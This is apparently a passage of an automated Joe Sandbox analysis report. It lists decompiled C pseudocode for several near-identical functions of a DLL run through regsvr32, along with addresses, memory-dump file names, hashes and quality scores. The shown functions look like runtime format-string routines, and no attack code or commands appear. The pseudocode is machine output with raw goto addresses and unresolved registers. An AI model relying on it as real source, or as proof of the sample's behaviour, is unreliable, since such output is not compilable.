                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t119 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t119 == 0) goto 0x8001d509;
                                                                      				goto 0x8001d493;
                                                                      				goto 0x8001d493;
                                                                      				if (_t119 == 0) goto 0x8001d478;
                                                                      				if (_t119 == 0) goto 0x8001d478;
                                                                      				if (_t119 == 0) goto 0x8001d478;
                                                                      				goto 0x8001d466;
                                                                      				_t130 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t130 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t130 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				E0000000118003AA20( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx, _t141,  *((char*)( *((intOrPtr*)(__rcx + 0x18)) - 8)), __rbp, _t157);
                                                                      				goto 0x8001d5fe;
                                                                      				 *((long long*)(_t134 + 0x18)) =  *((long long*)(_t134 + 0x18)) + 8;
                                                                      				if (0 == 0) goto 0x8001d586;
                                                                      				_t150 =  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x18)) - 8));
                                                                      				goto 0x8001d493;
                                                                      				goto 0x8001d493;
                                                                      				 *(_t134 + 0x28) =  *(_t134 + 0x28) & 0xfffffff7;
                                                                      				E00000001180023018(_t134, _t134 + 0x50,  *((intOrPtr*)(_t134 + 0x30)), _t150,  *((intOrPtr*)(_t134 + 8)));
                                                                      				if (_t150 != 0) goto 0x8001d5ae;
                                                                      				 *(_t134 + 0x28) =  *(_t134 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t134 + 0x4c)) = 1;
                                                                      				r8b = bpl;
                                                                      				if (_t144 != 8) goto 0x8001d5c8;
                                                                      				E0000000118002632C(0, _t134, _t150, _t159);
                                                                      				goto 0x8001d5cf;
                                                                      				E000000011800263B4( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x18)) - 8)), _t134, _t159);
                                                                      				if (0 == 0) goto 0x8001d5fc;
                                                                      				if ( *((intOrPtr*)(_t134 + 0x48)) == 0) goto 0x8001d5ed;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x40)))) == 0x30) goto 0x8001d5fc;
                                                                      				 *((long long*)(_t134 + 0x40)) =  *((long long*)(_t134 + 0x40)) + 0xfffffffe;
                                                                      				 *((short*)( *((intOrPtr*)(_t134 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t134 + 0x48)) =  *((intOrPtr*)(_t134 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}

















                                                                      0x18001d428
                                                                      0x18001d42d
                                                                      0x18001d432
                                                                      0x18001d43c
                                                                      0x18001d43f
                                                                      0x18001d442
                                                                      0x18001d445
                                                                      0x18001d448
                                                                      0x18001d44e
                                                                      0x18001d450
                                                                      0x18001d452
                                                                      0x18001d45b
                                                                      0x18001d464
                                                                      0x18001d469
                                                                      0x18001d472
                                                                      0x18001d478
                                                                      0x18001d480
                                                                      0x18001d49a
                                                                      0x18001d49f
                                                                      0x18001d4a7
                                                                      0x18001d4ae
                                                                      0x18001d4b4
                                                                      0x18001d4bb
                                                                      0x18001d4c8
                                                                      0x18001d4d8
                                                                      0x18001d4df
                                                                      0x18001d4e5
                                                                      0x18001d4ef
                                                                      0x18001d4f9
                                                                      0x18001d500
                                                                      0x18001d507
                                                                      0x18001d50d
                                                                      0x18001d512
                                                                      0x18001d51b
                                                                      0x18001d524
                                                                      0x18001d52a
                                                                      0x18001d52f
                                                                      0x18001d533
                                                                      0x18001d536
                                                                      0x18001d53d
                                                                      0x18001d541
                                                                      0x18001d54c
                                                                      0x18001d551
                                                                      0x18001d557
                                                                      0x18001d55e
                                                                      0x18001d56b
                                                                      0x18001d57b
                                                                      0x18001d57d
                                                                      0x18001d581
                                                                      0x18001d589
                                                                      0x18001d599
                                                                      0x18001d5a0
                                                                      0x18001d5a8
                                                                      0x18001d5aa
                                                                      0x18001d5ae
                                                                      0x18001d5b2
                                                                      0x18001d5bc
                                                                      0x18001d5c1
                                                                      0x18001d5c6
                                                                      0x18001d5ca
                                                                      0x18001d5d7
                                                                      0x18001d5e2
                                                                      0x18001d5eb
                                                                      0x18001d5ed
                                                                      0x18001d5f6
                                                                      0x18001d5f9
                                                                      0x18001d612

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 77a0b2e1962c52d8b93099797d0629f1da5ce65a0b5b47f643239d73a7d88bf9
                                                                      • Instruction ID: dcb80e90540c8c73ba47938870b3c7f9343bc29a3b86fab823ca272dc3fc3b3d
                                                                      • Opcode Fuzzy Hash: 77a0b2e1962c52d8b93099797d0629f1da5ce65a0b5b47f643239d73a7d88bf9
                                                                      • Instruction Fuzzy Hash: 8151A073614E1C83E7AA8F29C1543AC27A1E359BACF148216EE46177D8CF35DE49C780
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 72%
                                                                      			E0000000118001B49C(void* __edx, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
                                                                      				long long _v16;
                                                                      				signed long long _v24;
                                                                      				intOrPtr _t87;
                                                                      				signed int _t91;
                                                                      				void* _t111;
                                                                      				intOrPtr _t112;
                                                                      				signed int _t119;
                                                                      				intOrPtr _t130;
                                                                      				void* _t134;
                                                                      				void* _t141;
                                                                      				void* _t144;
                                                                      				intOrPtr _t150;
                                                                      				void* _t157;
                                                                      				void* _t159;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rbp;
                                                                      				_a24 = __rsi;
                                                                      				_t134 = __rcx;
                                                                      				bpl = __edx;
                                                                      				_t87 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				_t111 = _t87 - 5;
                                                                      				if (_t111 > 0) goto 0x8001b583;
                                                                      				if (_t111 == 0) goto 0x8001b4ec;
                                                                      				_t112 = _t87;
                                                                      				if (_t112 == 0) goto 0x8001b5d7;
                                                                      				if (_t112 == 0) goto 0x8001b55b;
                                                                      				if (_t112 == 0) goto 0x8001b534;
                                                                      				if (_t112 == 0) goto 0x8001b5d7;
                                                                      				if (_t87 - 0xffffffffffffffff != 1) goto 0x8001b5a3;
                                                                      				_t91 =  *(__rcx + 0x28);
                                                                      				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t144;
                                                                      				if ((_t91 >> 0x00000004 & 0x00000001) == 0) goto 0x8001b51e;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x8001b51e;
                                                                      				 *(__rcx + 0x28) = _t91 | 0x00000040;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001b602;
                                                                      				 *((intOrPtr*)(__rcx + 0x30)) = 1;
                                                                      				goto 0x8001b619;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001b555;
                                                                      				goto 0x8001b507;
                                                                      				goto 0x8001b507;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t119 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t119 == 0) goto 0x8001b57d;
                                                                      				goto 0x8001b507;
                                                                      				goto 0x8001b507;
                                                                      				if (_t119 == 0) goto 0x8001b4ec;
                                                                      				if (_t119 == 0) goto 0x8001b4ec;
                                                                      				if (_t119 == 0) goto 0x8001b4ec;
                                                                      				goto 0x8001b4da;
                                                                      				_t130 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t130 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t130 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				E0000000118003AA20( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx, _t141,  *((char*)( *((intOrPtr*)(__rcx + 0x18)) - 8)), __rbp, _t157);
                                                                      				goto 0x8001b672;
                                                                      				 *((long long*)(_t134 + 0x18)) =  *((long long*)(_t134 + 0x18)) + 8;
                                                                      				if (0 == 0) goto 0x8001b5fa;
                                                                      				_t150 =  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x18)) - 8));
                                                                      				goto 0x8001b507;
                                                                      				goto 0x8001b507;
                                                                      				 *(_t134 + 0x28) =  *(_t134 + 0x28) & 0xfffffff7;
                                                                      				E00000001180023018(_t134, _t134 + 0x50,  *((intOrPtr*)(_t134 + 0x30)), _t150,  *((intOrPtr*)(_t134 + 8)));
                                                                      				if (_t150 != 0) goto 0x8001b622;
                                                                      				 *(_t134 + 0x28) =  *(_t134 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t134 + 0x4c)) = 1;
                                                                      				r8b = bpl;
                                                                      				if (_t144 != 8) goto 0x8001b63c;
                                                                      				E0000000118002438C(_t134, _t150);
                                                                      				goto 0x8001b643;
                                                                      				E0000000118002444C( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x18)) - 8)), _t134, _t150, _t159);
                                                                      				if (0 == 0) goto 0x8001b670;
                                                                      				if ( *((intOrPtr*)(_t134 + 0x48)) == 0) goto 0x8001b661;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x40)))) == 0x30) goto 0x8001b670;
                                                                      				 *((long long*)(_t134 + 0x40)) =  *((long long*)(_t134 + 0x40)) + 0xfffffffe;
                                                                      				 *((short*)( *((intOrPtr*)(_t134 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t134 + 0x48)) =  *((intOrPtr*)(_t134 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}

















                                                                      0x18001b49c
                                                                      0x18001b4a1
                                                                      0x18001b4a6
                                                                      0x18001b4b0
                                                                      0x18001b4b3
                                                                      0x18001b4b6
                                                                      0x18001b4b9
                                                                      0x18001b4bc
                                                                      0x18001b4c2
                                                                      0x18001b4c4
                                                                      0x18001b4c6
                                                                      0x18001b4cf
                                                                      0x18001b4d8
                                                                      0x18001b4dd
                                                                      0x18001b4e6
                                                                      0x18001b4ec
                                                                      0x18001b4f4
                                                                      0x18001b50e
                                                                      0x18001b513
                                                                      0x18001b51b
                                                                      0x18001b522
                                                                      0x18001b528
                                                                      0x18001b52f
                                                                      0x18001b53c
                                                                      0x18001b54c
                                                                      0x18001b553
                                                                      0x18001b559
                                                                      0x18001b563
                                                                      0x18001b56d
                                                                      0x18001b574
                                                                      0x18001b57b
                                                                      0x18001b581
                                                                      0x18001b586
                                                                      0x18001b58f
                                                                      0x18001b598
                                                                      0x18001b59e
                                                                      0x18001b5a3
                                                                      0x18001b5a7
                                                                      0x18001b5aa
                                                                      0x18001b5b1
                                                                      0x18001b5b5
                                                                      0x18001b5c0
                                                                      0x18001b5c5
                                                                      0x18001b5cb
                                                                      0x18001b5d2
                                                                      0x18001b5df
                                                                      0x18001b5ef
                                                                      0x18001b5f1
                                                                      0x18001b5f5
                                                                      0x18001b5fd
                                                                      0x18001b60d
                                                                      0x18001b614
                                                                      0x18001b61c
                                                                      0x18001b61e
                                                                      0x18001b622
                                                                      0x18001b626
                                                                      0x18001b630
                                                                      0x18001b635
                                                                      0x18001b63a
                                                                      0x18001b63e
                                                                      0x18001b64b
                                                                      0x18001b656
                                                                      0x18001b65f
                                                                      0x18001b661
                                                                      0x18001b66a
                                                                      0x18001b66d
                                                                      0x18001b686

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 627a03d607416d9f24404c771662bb0f4fbffa77f75639d6f7251f04059a4a94
                                                                      • Instruction ID: 60c1917cc4c80e0f3209af88a411ae0df491d7f298040d853c7f151ee72eed9f
                                                                      • Opcode Fuzzy Hash: 627a03d607416d9f24404c771662bb0f4fbffa77f75639d6f7251f04059a4a94
                                                                      • Instruction Fuzzy Hash: 6151BF77600E5883E7AA8F28C0543AC37A5E359BACF148219EF459B7D9CF24DE49C780
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 72%
                                                                      			E00000001180027514(void* __edx, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
                                                                      				long long _v16;
                                                                      				signed long long _v24;
                                                                      				intOrPtr _t87;
                                                                      				signed int _t91;
                                                                      				void* _t111;
                                                                      				intOrPtr _t112;
                                                                      				signed int _t119;
                                                                      				intOrPtr _t130;
                                                                      				void* _t134;
                                                                      				void* _t141;
                                                                      				void* _t144;
                                                                      				intOrPtr _t150;
                                                                      				void* _t157;
                                                                      				void* _t159;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rbp;
                                                                      				_a24 = __rsi;
                                                                      				_t134 = __rcx;
                                                                      				bpl = __edx;
                                                                      				_t87 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				_t111 = _t87 - 5;
                                                                      				if (_t111 > 0) goto 0x800275fb;
                                                                      				if (_t111 == 0) goto 0x80027564;
                                                                      				_t112 = _t87;
                                                                      				if (_t112 == 0) goto 0x8002764f;
                                                                      				if (_t112 == 0) goto 0x800275d3;
                                                                      				if (_t112 == 0) goto 0x800275ac;
                                                                      				if (_t112 == 0) goto 0x8002764f;
                                                                      				if (_t87 - 0xffffffffffffffff != 1) goto 0x8002761b;
                                                                      				_t91 =  *(__rcx + 0x28);
                                                                      				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t144;
                                                                      				if ((_t91 >> 0x00000004 & 0x00000001) == 0) goto 0x80027596;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x80027596;
                                                                      				 *(__rcx + 0x28) = _t91 | 0x00000040;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8002767a;
                                                                      				 *((intOrPtr*)(__rcx + 0x30)) = 1;
                                                                      				goto 0x80027691;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x800275cd;
                                                                      				goto 0x8002757f;
                                                                      				goto 0x8002757f;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t119 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t119 == 0) goto 0x800275f5;
                                                                      				goto 0x8002757f;
                                                                      				goto 0x8002757f;
                                                                      				if (_t119 == 0) goto 0x80027564;
                                                                      				if (_t119 == 0) goto 0x80027564;
                                                                      				if (_t119 == 0) goto 0x80027564;
                                                                      				goto 0x80027552;
                                                                      				_t130 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t130 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t130 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				E0000000118003AA20( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx, _t141,  *((char*)( *((intOrPtr*)(__rcx + 0x18)) - 8)), __rbp, _t157);
                                                                      				goto 0x800276ea;
                                                                      				 *((long long*)(_t134 + 0x18)) =  *((long long*)(_t134 + 0x18)) + 8;
                                                                      				if (0 == 0) goto 0x80027672;
                                                                      				_t150 =  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x18)) - 8));
                                                                      				goto 0x8002757f;
                                                                      				goto 0x8002757f;
                                                                      				 *(_t134 + 0x28) =  *(_t134 + 0x28) & 0xfffffff7;
                                                                      				E00000001180023018(_t134, _t134 + 0x50,  *((intOrPtr*)(_t134 + 0x30)), _t150,  *((intOrPtr*)(_t134 + 8)));
                                                                      				if (_t150 != 0) goto 0x8002769a;
                                                                      				 *(_t134 + 0x28) =  *(_t134 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t134 + 0x4c)) = 1;
                                                                      				r8b = bpl;
                                                                      				if (_t144 != 8) goto 0x800276b4;
                                                                      				E00000001180027FFC(_t134, _t150);
                                                                      				goto 0x800276bb;
                                                                      				E000000011800280BC( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x18)) - 8)), _t134, _t150, _t159);
                                                                      				if (0 == 0) goto 0x800276e8;
                                                                      				if ( *((intOrPtr*)(_t134 + 0x48)) == 0) goto 0x800276d9;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x40)))) == 0x30) goto 0x800276e8;
                                                                      				 *((long long*)(_t134 + 0x40)) =  *((long long*)(_t134 + 0x40)) + 0xfffffffe;
                                                                      				 *((short*)( *((intOrPtr*)(_t134 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t134 + 0x48)) =  *((intOrPtr*)(_t134 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}

















                                                                      0x180027514
                                                                      0x180027519
                                                                      0x18002751e
                                                                      0x180027528
                                                                      0x18002752b
                                                                      0x18002752e
                                                                      0x180027531
                                                                      0x180027534
                                                                      0x18002753a
                                                                      0x18002753c
                                                                      0x18002753e
                                                                      0x180027547
                                                                      0x180027550
                                                                      0x180027555
                                                                      0x18002755e
                                                                      0x180027564
                                                                      0x18002756c
                                                                      0x180027586
                                                                      0x18002758b
                                                                      0x180027593
                                                                      0x18002759a
                                                                      0x1800275a0
                                                                      0x1800275a7
                                                                      0x1800275b4
                                                                      0x1800275c4
                                                                      0x1800275cb
                                                                      0x1800275d1
                                                                      0x1800275db
                                                                      0x1800275e5
                                                                      0x1800275ec
                                                                      0x1800275f3
                                                                      0x1800275f9
                                                                      0x1800275fe
                                                                      0x180027607
                                                                      0x180027610
                                                                      0x180027616
                                                                      0x18002761b
                                                                      0x18002761f
                                                                      0x180027622
                                                                      0x180027629
                                                                      0x18002762d
                                                                      0x180027638
                                                                      0x18002763d
                                                                      0x180027643
                                                                      0x18002764a
                                                                      0x180027657
                                                                      0x180027667
                                                                      0x180027669
                                                                      0x18002766d
                                                                      0x180027675
                                                                      0x180027685
                                                                      0x18002768c
                                                                      0x180027694
                                                                      0x180027696
                                                                      0x18002769a
                                                                      0x18002769e
                                                                      0x1800276a8
                                                                      0x1800276ad
                                                                      0x1800276b2
                                                                      0x1800276b6
                                                                      0x1800276c3
                                                                      0x1800276ce
                                                                      0x1800276d7
                                                                      0x1800276d9
                                                                      0x1800276e2
                                                                      0x1800276e5
                                                                      0x1800276fe

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d569c6407123f7b568b338938a5ab6c7b40a377c31d9d2dc83d871bc32d4c03f
                                                                      • Instruction ID: f42a4e179be6314537a5110bd892494de8ddf270575d5f0f8b45e9c3841cf203
                                                                      • Opcode Fuzzy Hash: d569c6407123f7b568b338938a5ab6c7b40a377c31d9d2dc83d871bc32d4c03f
                                                                      • Instruction Fuzzy Hash: 8951A377700A6882E7AF8F28C1543AC67A2E359BA8F158115EF4D177DACF21DE46C780
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 72%
                                                                      			E0000000118001D614(void* __edx, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
                                                                      				long long _v16;
                                                                      				signed long long _v24;
                                                                      				intOrPtr _t87;
                                                                      				signed int _t91;
                                                                      				void* _t111;
                                                                      				intOrPtr _t112;
                                                                      				signed int _t119;
                                                                      				intOrPtr _t130;
                                                                      				void* _t134;
                                                                      				void* _t141;
                                                                      				void* _t144;
                                                                      				intOrPtr _t150;
                                                                      				void* _t157;
                                                                      				void* _t159;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rbp;
                                                                      				_a24 = __rsi;
                                                                      				_t134 = __rcx;
                                                                      				bpl = __edx;
                                                                      				_t87 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				_t111 = _t87 - 5;
                                                                      				if (_t111 > 0) goto 0x8001d6fb;
                                                                      				if (_t111 == 0) goto 0x8001d664;
                                                                      				_t112 = _t87;
                                                                      				if (_t112 == 0) goto 0x8001d74f;
                                                                      				if (_t112 == 0) goto 0x8001d6d3;
                                                                      				if (_t112 == 0) goto 0x8001d6ac;
                                                                      				if (_t112 == 0) goto 0x8001d74f;
                                                                      				if (_t87 - 0xffffffffffffffff != 1) goto 0x8001d71b;
                                                                      				_t91 =  *(__rcx + 0x28);
                                                                      				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t144;
                                                                      				if ((_t91 >> 0x00000004 & 0x00000001) == 0) goto 0x8001d696;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x8001d696;
                                                                      				 *(__rcx + 0x28) = _t91 | 0x00000040;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001d77a;
                                                                      				 *((intOrPtr*)(__rcx + 0x30)) = 1;
                                                                      				goto 0x8001d791;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001d6cd;
                                                                      				goto 0x8001d67f;
                                                                      				goto 0x8001d67f;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t119 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t119 == 0) goto 0x8001d6f5;
                                                                      				goto 0x8001d67f;
                                                                      				goto 0x8001d67f;
                                                                      				if (_t119 == 0) goto 0x8001d664;
                                                                      				if (_t119 == 0) goto 0x8001d664;
                                                                      				if (_t119 == 0) goto 0x8001d664;
                                                                      				goto 0x8001d652;
                                                                      				_t130 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t130 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t130 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				E0000000118003AA20( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx, _t141,  *((char*)( *((intOrPtr*)(__rcx + 0x18)) - 8)), __rbp, _t157);
                                                                      				goto 0x8001d7ea;
                                                                      				 *((long long*)(_t134 + 0x18)) =  *((long long*)(_t134 + 0x18)) + 8;
                                                                      				if (0 == 0) goto 0x8001d772;
                                                                      				_t150 =  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x18)) - 8));
                                                                      				goto 0x8001d67f;
                                                                      				goto 0x8001d67f;
                                                                      				 *(_t134 + 0x28) =  *(_t134 + 0x28) & 0xfffffff7;
                                                                      				E00000001180023018(_t134, _t134 + 0x50,  *((intOrPtr*)(_t134 + 0x30)), _t150,  *((intOrPtr*)(_t134 + 8)));
                                                                      				if (_t150 != 0) goto 0x8001d79a;
                                                                      				 *(_t134 + 0x28) =  *(_t134 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t134 + 0x4c)) = 1;
                                                                      				r8b = bpl;
                                                                      				if (_t144 != 8) goto 0x8001d7b4;
                                                                      				E0000000118002643C(_t134, _t150);
                                                                      				goto 0x8001d7bb;
                                                                      				E000000011800264FC( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x18)) - 8)), _t134, _t150, _t159);
                                                                      				if (0 == 0) goto 0x8001d7e8;
                                                                      				if ( *((intOrPtr*)(_t134 + 0x48)) == 0) goto 0x8001d7d9;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x40)))) == 0x30) goto 0x8001d7e8;
                                                                      				 *((long long*)(_t134 + 0x40)) =  *((long long*)(_t134 + 0x40)) + 0xfffffffe;
                                                                      				 *((short*)( *((intOrPtr*)(_t134 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t134 + 0x48)) =  *((intOrPtr*)(_t134 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}

















                                                                      0x18001d614
                                                                      0x18001d619
                                                                      0x18001d61e
                                                                      0x18001d628
                                                                      0x18001d62b
                                                                      0x18001d62e
                                                                      0x18001d631
                                                                      0x18001d634
                                                                      0x18001d63a
                                                                      0x18001d63c
                                                                      0x18001d63e
                                                                      0x18001d647
                                                                      0x18001d650
                                                                      0x18001d655
                                                                      0x18001d65e
                                                                      0x18001d664
                                                                      0x18001d66c
                                                                      0x18001d686
                                                                      0x18001d68b
                                                                      0x18001d693
                                                                      0x18001d69a
                                                                      0x18001d6a0
                                                                      0x18001d6a7
                                                                      0x18001d6b4
                                                                      0x18001d6c4
                                                                      0x18001d6cb
                                                                      0x18001d6d1
                                                                      0x18001d6db
                                                                      0x18001d6e5
                                                                      0x18001d6ec
                                                                      0x18001d6f3
                                                                      0x18001d6f9
                                                                      0x18001d6fe
                                                                      0x18001d707
                                                                      0x18001d710
                                                                      0x18001d716
                                                                      0x18001d71b
                                                                      0x18001d71f
                                                                      0x18001d722
                                                                      0x18001d729
                                                                      0x18001d72d
                                                                      0x18001d738
                                                                      0x18001d73d
                                                                      0x18001d743
                                                                      0x18001d74a
                                                                      0x18001d757
                                                                      0x18001d767
                                                                      0x18001d769
                                                                      0x18001d76d
                                                                      0x18001d775
                                                                      0x18001d785
                                                                      0x18001d78c
                                                                      0x18001d794
                                                                      0x18001d796
                                                                      0x18001d79a
                                                                      0x18001d79e
                                                                      0x18001d7a8
                                                                      0x18001d7ad
                                                                      0x18001d7b2
                                                                      0x18001d7b6
                                                                      0x18001d7c3
                                                                      0x18001d7ce
                                                                      0x18001d7d7
                                                                      0x18001d7d9
                                                                      0x18001d7e2
                                                                      0x18001d7e5
                                                                      0x18001d7fe

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
